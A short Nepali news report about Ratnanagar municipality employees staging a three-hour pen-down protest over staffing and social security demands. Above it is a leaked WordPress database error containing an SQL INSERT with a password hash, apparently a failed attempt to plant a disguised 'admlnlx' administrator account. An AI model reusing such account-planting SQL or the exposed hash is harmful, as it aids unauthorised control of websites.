WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.4hvEOsKOXsKmKNVGKyyJnHilbXPp1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 21:34:28', '', 'admlnlx', 'admlnlx')
चितवन , माघ २८
स्थानीय निकायका कर्मचारीहरुको जारी आन्दोलन अन्तर्गत रत्ननगर नगरपालिकाका कर्मचारीहरुले शुक्रवार तीन घण्टा कलम बन्द गरेका छन । कर्मचारीहरुले १० बजे देखि १ बजे सम्म कालो पट्टी बाधेर कलम बन्द गरी सेवा ठप्प पारेका थिए ।
कमल बन्द गरिएको भएपनि अत्याबसेक सेवामा भने अबरोध नगरिएको स्थानीय निकाय ट्रेड युनियन सयुक्त समन्वय समिति जिल्ला सदस्य तथा राष्ट्रिय कर्मचारी संगठनका जिल्ला अध्यक्ष,रत्ननगर नगरपालिकाका जारी आन्दोलनका संयोजक प्रकाशचन्द्र ढुंगानाले जानकारी दिए । कर्मचारीहरुले नगपालिकाको मुख्य गेटमै धर्ना बसेर निर्धारित समय सम्म सेवा ठप्प पारेका थिए ।
निजामति कर्मचारीहरु स्थानीय तहका सम्पूर्ण दरबन्दीहरुलाई प्रदेश स्तरमा एकीकृत तथा एकत्रित गरी निश्चित प्रणालीका आधारमा पदस्थापन र सरुवा गर्नुपर्ने व्यवस्था गरिनु पर्ने,सेवा निवृत बखत पाउने उपदान,विमा,सन्तती छात्रबृत्ति,स्वास्थ्य उपचार लगायतका सामाजिक सुरक्षाको स्पष्ट व्यवस्था सहितको सुनिश्चितता गरिने पर्ने।